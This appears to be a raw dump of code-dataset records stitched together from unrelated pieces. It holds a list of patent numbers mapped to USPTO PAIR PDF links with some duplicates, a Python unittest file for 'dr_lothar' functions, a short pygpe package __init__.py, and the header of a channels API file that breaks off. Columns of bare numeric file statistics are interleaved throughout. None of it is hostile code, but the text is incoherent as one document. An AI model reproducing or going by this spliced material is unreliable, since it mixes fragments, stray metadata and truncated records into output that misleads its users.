0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HFFPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HFOPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HFVPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HG9WECVOPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HG9WECWMPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HG9WECXMPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF2YQ96BPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF2YQ971PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF30227TPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF302282PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF30228ZPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF49VFTIPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HC84J9DOPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HC84J9F9PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HC84J9FKPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HC84J9FSPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HC84J9GKPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HAN0CEIDPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HC84J9GKPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HAN0CEIUPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HAN0CEJ2PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HAN0CEJGPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDGQPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDHRPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDHZPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDIFPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDIOPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDIOPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDIXPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDK9PXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDNVPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GTNBC5KAPPOPPY2&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GILSPO9IPPOPPY5&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GGKRER3APPOPPY3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GEH3J3SHPPOPPY5&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=G8HPF9K5PPOPPY2&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GAL2TICFPPOPPY5&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HAN88OC2PXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA2KNSKMPXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA2KNSNRPXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA2KNSO0PXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H720OL1JPXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H720OL31PXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H720OL9FPXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H2W42CF0PXXIFW3&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H2W42CFPPXXIFW3&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GLNRKYA4PPOPPY5&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GD0CZPTZPPOPPY5&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GCI3NG3WPPOPPY2&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GCI3NGI6PPOPPY2&lang=DINO”,
0037375:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GJP6FDV8PPOPPY5&lang=DINO”,
0037375:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GIXIF4RJPPOPPY2&lang=DINO”,
0037375:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GIXIF4TEPPOPPY2&lang=DINO”,
0037375:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GF6QXDTWPPOPPY5&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I07GEW50PXXIFW4&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HZRKAGFBPXXIFW4&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HZMK2WY9PXXIFW3&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HZMK2WY9PXXIFW3&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWWEGFEPPXXIFW4&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HVPGF5XAPXXIFW1&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HFX87MGDPXXIFW3&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HFX87MGLPXXIFW3&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HVJO9YEPPXXIFW3&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HZXDEOIGPXXIFW4&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HZAC0H2GPXXIFW3&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HZAC0H3HPXXIFW3&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWW5R0GZPXXIFW4&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWW5R0HGPXXIFW4&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWW5R0HQPXXIFW4&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWL7PVTPPXXIFW3&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWL7PVVLPXXIFW3&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HUO4R3XDPXXIFW4&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HSX5S8XBPXXIFW4&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HABO4DG0PXXIFW3&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HXIATSA0PXXIFW3&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HXIATSAIPXXIFW3&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HV7PI60ZPXXIFW4&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HUJQGKSLPXXIFW4&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HT8PSQPHPXXIFW4&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HT2A952MPXXIFW3&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HT2A958PPXXIFW3&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HPCOS391PXXIFW4&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HOJCWSTCPXXIFW3&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HPCOC4WZPXXIFW4&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HPPSL6ADPXXIFW4&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HOJCWSU1PXXIFW3&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HUDEQC5DPXXIFW4&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTBHPINUPXXIFW4&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTBHPIOQPXXIFW4&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTBHPIPKPXXIFW4&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTHQLNM1PXXIFW3&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTHQLNLOPXXIFW3&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTR5XEB2PXXIFW4&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HOG526YWPXXIFW3&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHB8AFZSPXXIFW4&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HGZ9K36OPXXIFW3&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HG7Z5D10PXXIFW4&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HEIZ5UCKPXXIFW4&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HE5R3NW9PXXIFW3&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HDEIO4BJPXXIFW4&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HDEIO4C0PXXIFW4&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HCHYWBDKPXXIFW3&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HCHYWBE2PXXIFW3&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HCHYWBCDPXXIFW3&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H6TFT54JPXXIFW4&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GZ7754LUPXXIFW4&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF14VWVJPXXIFW4&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HE1P5WA8PXXIFW3&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H6GQTQCCPXXIFW3&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H2T77II0PXXIFW4&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H1Y1ODAGPXXIFW3&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H1Y1ODE1PXXIFW3&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GY5RXG4YPXXIFW4&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GWHY2QQSPXXIFW4&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GU8OCDWLPPOPPY2&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H4T5LQOHPXXIFW4&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H490KSJ5PXXIFW4&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H401XUKWPXXIFW3&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H3YB6FJGPXXIFW4&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H3YGVZEHPXXIFW3&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H3HLV38CPXXIFW3&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H0DU8YUTPXXIFW4&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GJ5QZBL6PPOPPY5&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GGP7MWD5PPOPPY2&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GFS8GS25PPOPPY5&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GER9TXVPPPOPPY5&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GER9U8BQPPOPPY5&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GF1H0O0EPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GU9DZN6ZPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GRXHKBC9PPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GRXHKBDCPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GRXHKBDYPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GRGTCOH5PPOPPY2&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GRJ8JJ3BPPOPPY1&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GR6KOVTAPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GJOJWB8OPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GJOJWBEBPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GF1DE7TCPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GB3QSZCRPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GAPHRL28PPOPPY2&lang=DINO”,
6873575:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=E5RBSEY8PP1GUI4&lang=DINO”,
6873575:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=E1UYF44GPP2GUI1&lang=DINO”,
6873575:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=DVGJ582RPPOPPY2&lang=DINO”,
6873575:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=DVGJ583WPPOPPY2&lang=DINO”,
6873575:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=DVGJ585JPPOPPY2&lang=DINO”,
6873575:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=DVGJ58AFPPOPPY2&lang=DINO”,
0159894:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HER43NQOPXXIFW4&lang=DINO”,
0159894:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H77IZGY6PXXIFW4&lang=DINO”,
0159894:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H77IZGZ0PXXIFW4&lang=DINO”,
0159894:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H3RLP36UPXXIFW4&lang=DINO”,
0159894:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H3RLP38QPXXIFW4&lang=DINO”,
0159894:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H3DEESG5PXXIFW4&lang=DINO”,
0172577:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GHI24DGSPPOPPY5&lang=DINO”,
0172577:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=G9NNG8EOPPOPPY5&lang=DINO”,
0172577:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=G9NNG8RLPPOPPY5&lang=DINO”,
0172577:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FIQOVQMRPPOPPY5&lang=DINO”,
0172577:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FH26DQSXPPOPPY5&lang=DINO”,
0172577:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FF3B5ETIPPOPPY5&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I1AQBVE8PXXIFW4&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I1AQBVEPPXXIFW4&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I1AQBVFEPXXIFW4&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I1AQBVFNPXXIFW4&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HVGQLQFLPXXIFW4&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTFP6HQGPXXIFW4&lang=DINO”,
0253412:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTFP6ODNPXXIFW4&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HYTE47GSPXXIFW4&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HXYTZX09PXXIFW3&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HY0CBY30PXXIFW1&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HXM56SG0PXXIFW3&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HUFHPTQOPXXIFW4&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HCKGGBW4PXXIFW1&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H8R8JJ5IPXXIFW4&lang=DINO”,
0235166:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GMJA0BD1PPOPPY2&lang=DINO”,
D701504S:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HSFFULBQPXXIFW4&lang=DINO”,
D701504S:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HQGZBINOPXXIFW3&lang=DINO”,
D701504S:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HN1TC3FQPXXIFW4&lang=DINO”,
D701504S:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLTC0IKJPXXIFW4&lang=DINO”,
D701504S:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLJN30GVPXXIFW3&lang=DINO”,
0177877:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWXUU20UPXXIFW4&lang=DINO”,
0177877:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHAK0G2BPXXIFW4&lang=DINO”,
0177877:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHAK0GUPPXXIFW4&lang=DINO”,
0177877:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HFX8B5XVPXXIFW3&lang=DINO”,
0177877:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HFX8B60WPXXIFW3&lang=DINO”,
0177877:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HFX8B620PXXIFW3&lang=DINO”,
0081179:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=F2TE48J7PPOPPY5&lang=DINO”,
0081179:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=EUTUB94OPPOPPY2&lang=DINO”,
0081179:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=ERUVVRHAPPOPPY2&lang=DINO”,
0081179:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=ERUVVRI4PPOPPY2&lang=DINO”,
0081179:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=EK9XV5K5PP1GUI2&lang=DINO”,
0081179:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=E0VLY8H2PP2GUI1&lang=DINO”,
0235348:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HGP3KY7SPXXIFW4&lang=DINO”,
0235348:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF4Y5OG3PXXIFW3&lang=DINO”,
0235348:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF4Y5OHHPXXIFW3&lang=DINO”,
0235348:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HCL81ZF6PXXIFW4&lang=DINO”,
0235348:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HBYBZS76PXXIFW3&lang=DINO”,
0235348:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H8PXY3K5PXXIFW4&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I3UOEMTOPXXIFW3&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I3ZRR92OPXXIFW2&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I3ZRR94KPXXIFW2&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I3Q7B8G4PXXIFW4&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I3Q7B8HRPXXIFW4&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HW0SDLKRPXXIFW3&lang=DINO”,
0216065:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HW3IP7DAPXXIFW4&lang=DINO”
}
| 95.752577
| 97
| 0.82472
| 3,446
| 27,864
| 6.668311
| 0.092571
| 0.124897
| 0.187345
| 0.224814
| 0.815614
| 0.815614
| 0.815614
| 0.815614
| 0.815614
| 0.813134
| 0
| 0.102016
| 0.010408
| 27,864
| 290
| 98
| 96.082759
| 0.731341
| 0
| 0
| 0.020761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
172894db1e0ac4db5f9ed2e13469bc0ecec922b1
| 744
|
py
|
Python
|
clase1/test_dr_lothar.py
|
martinadwek/python_course
|
a2c29bed2c616e1382dd5768588af1e27312ce52
|
[
"MIT"
] | null | null | null |
clase1/test_dr_lothar.py
|
martinadwek/python_course
|
a2c29bed2c616e1382dd5768588af1e27312ce52
|
[
"MIT"
] | null | null | null |
clase1/test_dr_lothar.py
|
martinadwek/python_course
|
a2c29bed2c616e1382dd5768588af1e27312ce52
|
[
"MIT"
] | null | null | null |
import unittest
from clase1.dr_lothar import dr_lothar, dr_lothar_rec
class DrLotharTestCase(unittest.TestCase):
    """Unit tests for the iterative dr_lothar implementation."""

    def test_even_number(self):
        # Expected value taken from the reference behaviour for even input.
        self.assertEqual(dr_lothar(6), 8)

    def test_odd_number(self):
        self.assertEqual(dr_lothar(3), 7)

    def test_leq_zero_number(self):
        # Non-positive input must be rejected with ValueError.
        with self.assertRaises(ValueError):
            dr_lothar(-1)
class DrLotharRecTestCase(unittest.TestCase):
    """Unit tests for the recursive dr_lothar_rec implementation."""

    def test_even_number(self):
        # The recursive variant takes an explicit accumulator seed of 0.
        self.assertEqual(dr_lothar_rec(6, 0), 8)

    def test_odd_number(self):
        self.assertEqual(dr_lothar_rec(3, 0), 7)

    def test_leq_zero_number(self):
        # Non-positive input must be rejected with ValueError.
        with self.assertRaises(ValueError):
            dr_lothar_rec(-1, 0)
if __name__ == '__main__':
    # Allow running this test module directly from the command line.
    unittest.main()
| 23.25
| 53
| 0.686828
| 101
| 744
| 4.712871
| 0.316832
| 0.151261
| 0.092437
| 0.210084
| 0.701681
| 0.701681
| 0.701681
| 0.701681
| 0.701681
| 0.701681
| 0
| 0.02381
| 0.209677
| 744
| 31
| 54
| 24
| 0.785714
| 0
| 0
| 0.4
| 0
| 0
| 0.010753
| 0
| 0
| 0
| 0
| 0
| 0.3
| 1
| 0.3
| false
| 0
| 0.1
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1750bf272701dfd751b845c27ce6a3c46dbf1c09
| 159
|
py
|
Python
|
pygpe/spin_1/__init__.py
|
wheelerMT/pygpe
|
c0dc5dc7d2d6778b50103e47a3590472ee218261
|
[
"MIT"
] | null | null | null |
pygpe/spin_1/__init__.py
|
wheelerMT/pygpe
|
c0dc5dc7d2d6778b50103e47a3590472ee218261
|
[
"MIT"
] | null | null | null |
pygpe/spin_1/__init__.py
|
wheelerMT/pygpe
|
c0dc5dc7d2d6778b50103e47a3590472ee218261
|
[
"MIT"
] | null | null | null |
from . import evolution
from .evolution import *
from . import wavefunction
from .wavefunction import *
from . import data_manager
from .data_manager import *
| 22.714286
| 27
| 0.792453
| 20
| 159
| 6.2
| 0.3
| 0.241935
| 0.258065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150943
| 159
| 6
| 28
| 26.5
| 0.918519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bd5e44e95d6648c56f19a535c6cb3630b6733d0d
| 20,756
|
py
|
Python
|
channels_client/api/channels_api.py
|
pitzer42/opbk-br-quickstart
|
b3f86b2e5f82a6090aaefb563614e174a452383c
|
[
"MIT"
] | 2
|
2021-02-07T23:58:36.000Z
|
2021-02-08T01:03:25.000Z
|
channels_client/api/channels_api.py
|
pitzer42/opbk-br-quickstart
|
b3f86b2e5f82a6090aaefb563614e174a452383c
|
[
